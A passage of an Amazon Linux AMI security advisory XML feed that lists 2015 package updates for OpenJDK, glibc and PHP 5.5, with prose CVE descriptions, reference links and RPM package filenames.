It was discovered that the SSL/TLS implementation in the JSSE component in OpenJDK failed to properly check whether the ChangeCipherSpec was received during the SSL/TLS connection handshake. An MITM attacker could possibly use this flaw to force a connection to be established without encryption being enabled.
CVE-2014-6591:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-6587:
A NULL pointer dereference flaw was found in the MulticastSocket implementation in the Libraries component of OpenJDK. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions.
CVE-2014-6585:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-3566:
A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.
1152789:
CVE-2014-3566 openssl: Padding Oracle On Downgraded Legacy Encryption attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566" title="" id="CVE-2014-3566" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6585" title="" id="CVE-2014-6585" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6587" title="" id="CVE-2014-6587" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6591" title="" id="CVE-2014-6591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6593" title="" id="CVE-2014-6593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6601" title="" id="CVE-2014-6601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0383" title="" id="CVE-2015-0383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0395" title="" id="CVE-2015-0395" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0407" title="" id="CVE-2015-0407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0408" title="" id="CVE-2015-0408" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0410" title="" id="CVE-2015-0410" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0412" title="" id="CVE-2015-0412" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0067.html" title="" id="RHSA-2015:0067" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-devel" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.75-2.5.4.0.53.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.75-2.5.4.0.53.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.75-2.5.4.0.53.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.75-2.5.4.0.53.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.75-2.5.4.0.53.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.75-2.5.4.0.53.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.75-2.5.4.0.53.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.75-2.5.4.0.53.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.75-2.5.4.0.53.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.75-2.5.4.0.53.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.75-2.5.4.0.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-472</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-472: important priority package update for java-1.8.0-openjdk</title><issued date="2015-01-22 14:20:00" /><updated date="2015-01-22 16:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0437:
Multiple flaws were found in the way the Hotspot component in OpenJDK verified bytecode from the class files, and in the way this component generated code for bytecode. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2015-0412:
Multiple improper permission check issues were discovered in the JAX-WS, Libraries, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0410:
A flaw was found in the way the DER (Distinguished Encoding Rules) decoder in the Security component in OpenJDK handled negative length values. A specially crafted, DER-encoded input could cause a Java application to enter an infinite loop when decoded.
CVE-2015-0408:
Multiple improper permission check issues were discovered in the JAX-WS, Libraries, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0407:
An information leak flaw was found in the Swing component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-0395:
A flaw was found in the way the Hotspot garbage collector handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2015-0383:
Multiple insecure temporary file use issues were found in the way the Hotspot component in OpenJDK created performance statistics and error log files. A local attacker could possibly make a victim using OpenJDK overwrite arbitrary files using a symlink attack.
CVE-2014-6601:
Multiple flaws were found in the way the Hotspot component in OpenJDK verified bytecode from the class files, and in the way this component generated code for bytecode. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2014-6593:
It was discovered that the SSL/TLS implementation in the JSSE component in OpenJDK failed to properly check whether the ChangeCipherSpec was received during the SSL/TLS connection handshake. An MITM attacker could possibly use this flaw to force a connection to be established without encryption being enabled.
CVE-2014-6591:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-6587:
A NULL pointer dereference flaw was found in the MulticastSocket implementation in the Libraries component of OpenJDK. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions.
CVE-2014-6585:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-6549:
Multiple improper permission check issues were discovered in the JAX-WS, Libraries, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-3566:
A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.
1152789:
CVE-2014-3566 openssl: Padding Oracle On Downgraded Legacy Encryption attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566" title="" id="CVE-2014-3566" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6549" title="" id="CVE-2014-6549" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6585" title="" id="CVE-2014-6585" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6587" title="" id="CVE-2014-6587" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6591" title="" id="CVE-2014-6591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6593" title="" id="CVE-2014-6593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6601" title="" id="CVE-2014-6601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0383" title="" id="CVE-2015-0383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0395" title="" id="CVE-2015-0395" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0407" title="" id="CVE-2015-0407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0408" title="" id="CVE-2015-0408" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0410" title="" id="CVE-2015-0410" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0412" title="" id="CVE-2015-0412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0437" title="" id="CVE-2015-0437" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0069.html" title="" id="RHSA-2015:0069" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.31-2.b13.5.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.31-2.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.31" release="2.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.31-2.b13.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-473</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-473: critical priority package update for glibc</title><issued date="2015-01-27 11:41:00" /><updated date="2015-01-28 19:57:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0235:
A heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.
1183461:
CVE-2015-0235 glibc: __nss_hostname_digits_dots() heap-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235" title="" id="CVE-2015-0235" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-utils" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.93.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.93.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.93.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.93.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.93.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-474</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-474: medium priority package update for php55</title><issued date="2015-02-11 19:33:00" /><updated date="2015-02-11 19:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0232:
The exif_process_unicode function in ext/exif/exif.c in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image.
1185472:
CVE-2015-0232 php: Free called on unitialized pointer in exif.c
CVE-2015-0231:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
1185397:
CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)
CVE-2014-9427:
sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping's length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping.
1178736:
CVE-2014-9427 php: out of bounds read when parsing a crafted .php file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427" title="" id="CVE-2014-9427" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231" title="" id="CVE-2015-0231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232" title="" id="CVE-2015-0232" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-pgsql" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.21" release="1.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.21-1.96.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.21" release="1.96.amzn1" epoch="0" 